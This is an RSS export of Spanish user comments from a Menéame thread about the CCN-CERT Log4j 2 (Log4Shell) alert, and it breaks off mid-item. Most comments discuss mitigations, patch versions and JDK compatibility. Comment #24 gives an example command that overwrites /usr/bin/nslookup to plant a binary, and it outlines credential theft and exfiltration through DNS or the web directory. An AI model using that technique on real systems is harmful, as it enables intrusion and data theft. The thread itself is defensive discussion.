Aunque es más fácil decir que hacer <img data-src="https://cdn.mnmstatic.net/v_149/img/menemojis/36/tongue.png" alt=":-P" title=":-P" width="18" height="18" src="https://cdn.mnmstatic.net/v_149/img/g.gif" class="emoji lazy" /></p><p>&#187;&nbsp;autor: <strong>--652706--</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34540237</meneame:comment_id>
		<meneame:link_id>3595568</meneame:link_id>
		<meneame:order>34</meneame:order>
		<meneame:user>alvdavi</meneame:user>
		<meneame:votes>1</meneame:votes>
		<meneame:karma>9</meneame:karma>
		<meneame:url>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2</meneame:url>
		<title>#34 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]</title>
		<link>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c034#c-34</link>
		<pubDate>Tue, 14 Dec 2021 10:51:59 +0000</pubDate>
		<dc:creator>alvdavi</dc:creator>
		<guid>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c034#c-34</guid>
		<description><![CDATA[<p><a class="tooltip c:3595568-24" href="https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c024#c-24" rel="nofollow">#24</a> para invocar otros comandos este ataque primero tiene que hacer que la máquina atacada se conecte a un servidor remoto</p><p>&#187;&nbsp;autor: <strong>alvdavi</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34540223</meneame:comment_id>
		<meneame:link_id>3595568</meneame:link_id>
		<meneame:order>33</meneame:order>
		<meneame:user>pendejo1983</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>9</meneame:karma>
		<meneame:url>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2</meneame:url>
		<title>#33 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]</title>
		<link>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c033#c-33</link>
		<pubDate>Tue, 14 Dec 2021 10:50:29 +0000</pubDate>
		<dc:creator>pendejo1983</dc:creator>
		<guid>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c033#c-33</guid>
		<description><![CDATA[<p><a class="tooltip c:3595568-31" href="https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c031#c-31" rel="nofollow">#31</a> gracias</p><p>&#187;&nbsp;autor: <strong>pendejo1983</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34540152</meneame:comment_id>
		<meneame:link_id>3595568</meneame:link_id>
		<meneame:order>32</meneame:order>
		<meneame:user>snowdenknows</meneame:user>
		<meneame:votes>1</meneame:votes>
		<meneame:karma>16</meneame:karma>
		<meneame:url>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2</meneame:url>
		<title>#32 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]</title>
		<link>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c032#c-32</link>
		<pubDate>Tue, 14 Dec 2021 10:43:47 +0000</pubDate>
		<dc:creator>snowdenknows</dc:creator>
		<guid>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c032#c-32</guid>
		<description><![CDATA[<p>Aquí otra mitigación sencilla, básicamente cargarse la clase JndiLookup del jar <a href="https://github.com/zhangyoufu/log4j2-without-jndi/blob/master/README_en.md" title="github.com/zhangyoufu/log4j2-without-jndi/blob/master/README_en.md" rel="nofollow">github.com/zhangyoufu/log4j2-without-jndi/blob/master/README_en.md</a></p><p>&#187;&nbsp;autor: <strong>snowdenknows</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34540149</meneame:comment_id>
		<meneame:link_id>3595568</meneame:link_id>
		<meneame:order>31</meneame:order>
		<meneame:user>alvdavi</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>6</meneame:karma>
		<meneame:url>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2</meneame:url>
		<title>#31 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]</title>
		<link>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c031#c-31</link>
		<pubDate>Tue, 14 Dec 2021 10:43:15 +0000</pubDate>
		<dc:creator>alvdavi</dc:creator>
		<guid>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c031#c-31</guid>
		<description><![CDATA[<p><a class="tooltip c:3595568-29" href="https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c029#c-29" rel="nofollow">#29</a> imagino que Tomcat tendrá algún lugar donde se configuran los parámetros de arranque, pero personalmente no he trabajado nunca con tomcat, no sabría decirte donde es</p><p>&#187;&nbsp;autor: <strong>alvdavi</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34540132</meneame:comment_id>
		<meneame:link_id>3595568</meneame:link_id>
		<meneame:order>30</meneame:order>
		<meneame:user>alvdavi</meneame:user>
		<meneame:votes>1</meneame:votes>
		<meneame:karma>13</meneame:karma>
		<meneame:url>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2</meneame:url>
		<title>#30 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]</title>
		<link>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c030#c-30</link>
		<pubDate>Tue, 14 Dec 2021 10:41:17 +0000</pubDate>
		<dc:creator>alvdavi</dc:creator>
		<guid>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c030#c-30</guid>
		<description><![CDATA[<p><a class="tooltip c:3595568-28" href="https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c028#c-28" rel="nofollow">#28</a> como te digo, no es que no funcione en 7, es mas que no hemos tenido tiempo de probarlo, ya que no publicamos binarios de Corretto basados en OpenJDK7. Así de cabeza no se me ocurre por que no iba a funcionar en 7. Si es importante para vosotros, prueba en una máquina de desarrollo</p><p>&#187;&nbsp;autor: <strong>alvdavi</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34540108</meneame:comment_id>
		<meneame:link_id>3595568</meneame:link_id>
		<meneame:order>29</meneame:order>
		<meneame:user>pendejo1983</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>9</meneame:karma>
		<meneame:url>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2</meneame:url>
		<title>#29 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]</title>
		<link>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c029#c-29</link>
		<pubDate>Tue, 14 Dec 2021 10:39:25 +0000</pubDate>
		<dc:creator>pendejo1983</dc:creator>
		<guid>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c029#c-29</guid>
		<description><![CDATA[<p><a class="tooltip c:3595568-27" href="https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c027#c-27" rel="nofollow">#27</a> pero la arranca Apache Tomcat, no? Pensaba que sería algo a modificar en algún fichero de configuración</p><p>&#187;&nbsp;autor: <strong>pendejo1983</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34540050</meneame:comment_id>
		<meneame:link_id>3595568</meneame:link_id>
		<meneame:order>28</meneame:order>
		<meneame:user>infestissumam</meneame:user>
		<meneame:votes>1</meneame:votes>
		<meneame:karma>23</meneame:karma>
		<meneame:url>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2</meneame:url>
		<title>#28 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]</title>
		<link>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c028#c-28</link>
		<pubDate>Tue, 14 Dec 2021 10:34:39 +0000</pubDate>
		<dc:creator>infestissumam</dc:creator>
		<guid>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c028#c-28</guid>
		<description><![CDATA[<p><strong><a class="tooltip c:3595568-16" href="https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c016#c-16" rel="nofollow">#16</a></strong> <strong><a class="tooltip c:3595568-26" href="https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c026#c-26" rel="nofollow">#26</a></strong>  A eso me refería, si. Parece que este parche solo sirve para versiones superiores a JDK 1.8, nosotros tenemos JDK 1.7 en algunos servidores y log4j 1.15 no es compatible con JDK 1.7</p><p>&#187;&nbsp;autor: <strong>infestissumam</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34540032</meneame:comment_id>
		<meneame:link_id>3595568</meneame:link_id>
		<meneame:order>27</meneame:order>
		<meneame:user>alvdavi</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>6</meneame:karma>
		<meneame:url>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2</meneame:url>
		<title>#27 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]</title>
		<link>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c027#c-27</link>
		<pubDate>Tue, 14 Dec 2021 10:33:27 +0000</pubDate>
		<dc:creator>alvdavi</dc:creator>
		<guid>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c027#c-27</guid>
		<description><![CDATA[<p><a class="tooltip c:3595568-22" href="https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c022#c-22" rel="nofollow">#22</a> son parámetros que pasas a la máquina virtual de Java al arrancar, después de java y antes de la clase que quieres que se ejecute (o antes de -jar si estas ejecutando un jar)</p><p>&#187;&nbsp;autor: <strong>alvdavi</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34540002</meneame:comment_id>
		<meneame:link_id>3595568</meneame:link_id>
		<meneame:order>26</meneame:order>
		<meneame:user>alvdavi</meneame:user>
		<meneame:votes>2</meneame:votes>
		<meneame:karma>19</meneame:karma>
		<meneame:url>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2</meneame:url>
		<title>#26 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]</title>
		<link>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c026#c-26</link>
		<pubDate>Tue, 14 Dec 2021 10:30:51 +0000</pubDate>
		<dc:creator>alvdavi</dc:creator>
		<guid>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c026#c-26</guid>
		<description><![CDATA[<p><a class="tooltip c:3595568-16" href="https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c016#c-16" rel="nofollow">#16</a> imagino que se refiere a si la utilidad (que funciona adjuntándose a la máquina virtual y redefiniendo el bytecode de JndiLookup::lookup) funciona con JDK1.7 o no, no si Log4Shell le afecta</p><p>&#187;&nbsp;autor: <strong>alvdavi</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34539997</meneame:comment_id>
		<meneame:link_id>3595568</meneame:link_id>
		<meneame:order>25</meneame:order>
		<meneame:user>--59291--</meneame:user>
		<meneame:votes>1</meneame:votes>
		<meneame:karma>3</meneame:karma>
		<meneame:url>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2</meneame:url>
		<title>#25 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]</title>
		<link>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c025#c-25</link>
		<pubDate>Tue, 14 Dec 2021 10:30:10 +0000</pubDate>
		<dc:creator>--59291--</dc:creator>
		<guid>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c025#c-25</guid>
		<description><![CDATA[<p><a class="tooltip c:3595568-21" href="https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c021#c-21" rel="nofollow">#21</a> cierto, gracias por el aporte. <br />
<br />
la solución en <a class="tooltip c:3595568-8" href="https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c08#c-8" rel="nofollow">#8</a> es para versiones de log4j entre 2.10 y 2.14.</p><p>&#187;&nbsp;autor: <strong>--59291--</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34539992</meneame:comment_id>
		<meneame:link_id>3595568</meneame:link_id>
		<meneame:order>24</meneame:order>
		<meneame:user>nodanero</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>6</meneame:karma>
		<meneame:url>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2</meneame:url>
		<title>#24 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]</title>
		<link>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c024#c-24</link>
		<pubDate>Tue, 14 Dec 2021 10:29:09 +0000</pubDate>
		<dc:creator>nodanero</dc:creator>
		<guid>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c024#c-24</guid>
		<description><![CDATA[<p><a class="tooltip c:3595568-2" href="https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c02#c-2" rel="nofollow">#2</a> Esto es importante de aplicar, pero no todos los ataques se enfocan en descargar codigo desde un servidor remoto.<br />
Este ataque podria invocar otros comandos para crear por ejemplo un binario o un script ejecutable. Por ejemplo, reemplazando una utilidad del sistema ya tendria permisos de ejecucion.<br />
<br />
Ejemplo: &#34;echo &#34;xyz&#34; &#62; /usr/bin/nslookup&#34;, concatenando lineas hasta que el binario esta completado.<br />
El binario podria tener como funcionalidad capturar credenciales a bases de datos, escaneo de puertos, coleccion de certificados privados etc.<br />
<br />
Enviar trafico al exterior en ciertos escenarios es posible yendo encapsulado con DNS u otro trafico, o a traves de otro nodo. Pero siendo un servidor web, podrias recopilar los datos en un archivo o varios en el directorio web y despues descargarlos llamando la URL.</p><p>&#187;&nbsp;autor: <strong>nodanero</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34539970</meneame:comment_id>
		<meneame:link_id>3595568</meneame:link_id>
		<meneame:order>23</meneame:order>
		<meneame:user>alvdavi</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>6</meneame:karma>
		<meneame:url>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2</meneame:url>
		<title>#23 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]</title>
		<link>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c023#c-23</link>
		<pubDate>Tue, 14 Dec 2021 10:27:36 +0000</pubDate>
		<dc:creator>alvdavi</dc:creator>
		<guid>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c023#c-23</guid>
		<description><![CDATA[<p><a class="tooltip c:3595568-8" href="https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c08#c-8" rel="nofollow">#8</a> <a class="tooltip c:3595568-12" href="https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c012#c-12" rel="nofollow">#12</a> para casos como los que mencionáis es para lo que vale la utilidad de parcheo en caliente que se menciona más arriba</p><p>&#187;&nbsp;autor: <strong>alvdavi</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34539963</meneame:comment_id>
		<meneame:link_id>3595568</meneame:link_id>
		<meneame:order>22</meneame:order>
		<meneame:user>pendejo1983</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>9</meneame:karma>
		<meneame:url>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2</meneame:url>
		<title>#22 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]</title>
		<link>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c022#c-22</link>
		<pubDate>Tue, 14 Dec 2021 10:26:41 +0000</pubDate>
		<dc:creator>pendejo1983</dc:creator>
		<guid>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c022#c-22</guid>
		<description><![CDATA[<p><a class="tooltip c:3595568-8" href="https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c08#c-8" rel="nofollow">#8</a> dónde las configuras?</p><p>&#187;&nbsp;autor: <strong>pendejo1983</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34539951</meneame:comment_id>
		<meneame:link_id>3595568</meneame:link_id>
		<meneame:order>21</meneame:order>
		<meneame:user>alvdavi</meneame:user>
		<meneame:votes>3</meneame:votes>
		<meneame:karma>36</meneame:karma>
		<meneame:url>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2</meneame:url>
		<title>#21 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]</title>
		<link>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c021#c-21</link>
		<pubDate>Tue, 14 Dec 2021 10:25:50 +0000</pubDate>
		<dc:creator>alvdavi</dc:creator>
		<guid>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c021#c-21</guid>
		<description><![CDATA[<p><a class="tooltip c:3595568-8" href="https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c08#c-8" rel="nofollow">#8</a> la propiedad clave, log4j2.formatMsgNoLookups, se añadió en log4j 2.10. Si usas una versión anterior poner la propiedad no tendrá ningún efecto y seguiréis siendo vulnerables</p><p>&#187;&nbsp;autor: <strong>alvdavi</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34539925</meneame:comment_id>
		<meneame:link_id>3595568</meneame:link_id>
		<meneame:order>20</meneame:order>
		<meneame:user>alvdavi</meneame:user>
		<meneame:votes>1</meneame:votes>
		<meneame:karma>13</meneame:karma>
		<meneame:url>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2</meneame:url>
		<title>#20 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]</title>
		<link>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c020#c-20</link>
		<pubDate>Tue, 14 Dec 2021 10:23:07 +0000</pubDate>
		<dc:creator>alvdavi</dc:creator>
		<guid>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c020#c-20</guid>
		<description><![CDATA[<p><a class="tooltip c:3595568-4" href="https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c04#c-4" rel="nofollow">#4</a> un pequeño recordatorio, el parche no persiste si se reinicia la máquina virtual. Es posible aplicar el parche en modo agente pasando un parámetro a la hora de arrancar, pero si vas a parar la máquina y puedes, la recomendación es actualizar log4j</p><p>&#187;&nbsp;autor: <strong>alvdavi</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34539918</meneame:comment_id>
		<meneame:link_id>3595568</meneame:link_id>
		<meneame:order>19</meneame:order>
		<meneame:user>--59291--</meneame:user>
		<meneame:votes>3</meneame:votes>
		<meneame:karma>17</meneame:karma>
		<meneame:url>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2</meneame:url>
		<title>#19 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]</title>
		<link>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c019#c-19</link>
		<pubDate>Tue, 14 Dec 2021 10:22:19 +0000</pubDate>
		<dc:creator>--59291--</dc:creator>
		<guid>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c019#c-19</guid>
		<description><![CDATA[<p><a class="tooltip c:3595568-18" href="https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c018#c-18" rel="nofollow">#18</a> Wazuh es tu amigo.</p><p>&#187;&nbsp;autor: <strong>--59291--</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34539915</meneame:comment_id>
		<meneame:link_id>3595568</meneame:link_id>
		<meneame:order>18</meneame:order>
		<meneame:user>eldarel</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>11</meneame:karma>
		<meneame:url>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2</meneame:url>
		<title>#18 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]</title>
		<link>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c018#c-18</link>
		<pubDate>Tue, 14 Dec 2021 10:21:53 +0000</pubDate>
		<dc:creator>eldarel</dc:creator>
		<guid>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c018#c-18</guid>
		<description><![CDATA[<p><a class="tooltip c:3595568-10" href="https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c010#c-10" rel="nofollow">#10</a> La de veces que me dicen yo lo tengo todo actualizado y estoy migrando lo que no...<br />
Luego, le suelto lo de vamos ha hacer inventario y <img data-src="https://cdn.mnmstatic.net/v_149/img/menemojis/36/lol.gif" alt="xD" title=":lol: xD" width="18" height="18" src="https://cdn.mnmstatic.net/v_149/img/g.gif" class="emoji lazy" /> <img data-src="https://cdn.mnmstatic.net/v_149/img/menemojis/36/lol.gif" alt="xD" title=":lol: xD" width="18" height="18" src="https://cdn.mnmstatic.net/v_149/img/g.gif" class="emoji lazy" /> <img data-src="https://cdn.mnmstatic.net/v_149/img/menemojis/36/lol.gif" alt="xD" title=":lol: xD" width="18" height="18" src="https://cdn.mnmstatic.net/v_149/img/g.gif" class="emoji lazy" /></p><p>&#187;&nbsp;autor: <strong>eldarel</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34539905</meneame:comment_id>
		<meneame:link_id>3595568</meneame:link_id>
		<meneame:order>17</meneame:order>
		<meneame:user>alvdavi</meneame:user>
		<meneame:votes>1</meneame:votes>
		<meneame:karma>9</meneame:karma>
		<meneame:url>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2</meneame:url>
		<title>#17 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]</title>
		<link>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c017#c-17</link>
		<pubDate>Tue, 14 Dec 2021 10:20:56 +0000</pubDate>
		<dc:creator>alvdavi</dc:creator>
		<guid>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c017#c-17</guid>
		<description><![CDATA[<p><a class="tooltip c:3595568-14" href="https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c014#c-14" rel="nofollow">#14</a> Hemos probado la utilidad en 8, 11 y 15. Cuando tengamos algo de tiempo subiremos la versión que soporta 17 en caliente, ya que la que hay ahora en github para 17 solo funciona en modo agente.<br />
<br />
No se me ocurre un motivo por el que no vaya a funcionar en 7, pero no la hemos probado</p><p>&#187;&nbsp;autor: <strong>alvdavi</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34539901</meneame:comment_id>
		<meneame:link_id>3595568</meneame:link_id>
		<meneame:order>16</meneame:order>
		<meneame:user>--59291--</meneame:user>
		<meneame:votes>1</meneame:votes>
		<meneame:karma>3</meneame:karma>
		<meneame:url>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2</meneame:url>
		<title>#16 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]</title>
		<link>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c016#c-16</link>
		<pubDate>Tue, 14 Dec 2021 10:20:34 +0000</pubDate>
		<dc:creator>--59291--</dc:creator>
		<guid>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c016#c-16</guid>
		<description><![CDATA[<p><a class="tooltip c:3595568-14" href="https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c014#c-14" rel="nofollow">#14</a> a ver, si usas Java, pero por alguna razón no usas log4j da igual. Aquí el problema es usar log4j inferior a 2.15.0. Entonces esas opciones te debería valer.</p><p>&#187;&nbsp;autor: <strong>--59291--</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34539877</meneame:comment_id>
		<meneame:link_id>3595568</meneame:link_id>
		<meneame:order>15</meneame:order>
		<meneame:user>xkill</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>10</meneame:karma>
		<meneame:url>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2</meneame:url>
		<title>#15 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]</title>
		<link>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c015#c-15</link>
		<pubDate>Tue, 14 Dec 2021 10:17:18 +0000</pubDate>
		<dc:creator>xkill</dc:creator>
		<guid>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c015#c-15</guid>
		<description><![CDATA[<p><a class="tooltip c:3595568-13" href="https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c013#c-13" rel="nofollow">#13</a> hasta que caiga media empresa, todos los equipos cifrados,... y se vea claramente que fue por no parchear está vulnerabilidad.<br />
A lo mejor se encargan hasta de robarle las cuentas del banco o publicar su sueldo...</p><p>&#187;&nbsp;autor: <strong>xkill</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34539864</meneame:comment_id>
		<meneame:link_id>3595568</meneame:link_id>
		<meneame:order>14</meneame:order>
		<meneame:user>infestissumam</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>13</meneame:karma>
		<meneame:url>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2</meneame:url>
		<title>#14 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]</title>
		<link>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c014#c-14</link>
		<pubDate>Tue, 14 Dec 2021 10:15:44 +0000</pubDate>
		<dc:creator>infestissumam</dc:creator>
		<guid>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c014#c-14</guid>
		<description><![CDATA[<p><strong><a class="tooltip c:3595568-4" href="https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c04#c-4" rel="nofollow">#4</a></strong>  ¿Sirve para todas las versiones de java, incluso JDK 1.7?</p><p>&#187;&nbsp;autor: <strong>infestissumam</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34539828</meneame:comment_id>
		<meneame:link_id>3595568</meneame:link_id>
		<meneame:order>13</meneame:order>
		<meneame:user>--59291--</meneame:user>
		<meneame:votes>2</meneame:votes>
		<meneame:karma>20</meneame:karma>
		<meneame:url>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2</meneame:url>
		<title>#13 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]</title>
		<link>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c013#c-13</link>
		<pubDate>Tue, 14 Dec 2021 10:11:10 +0000</pubDate>
		<dc:creator>--59291--</dc:creator>
		<guid>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c013#c-13</guid>
		<description><![CDATA[<p><a class="tooltip c:3595568-12" href="https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c012#c-12" rel="nofollow">#12</a> todo por correo/escrito. 2ª ley del DevOps<br />
<br />
Y cuando el responsable de que no se pueda parchear es el CTO, poco puedes hacer.</p><p>&#187;&nbsp;autor: <strong>--59291--</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34539820</meneame:comment_id>
		<meneame:link_id>3595568</meneame:link_id>
		<meneame:order>12</meneame:order>
		<meneame:user>xkill</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>10</meneame:karma>
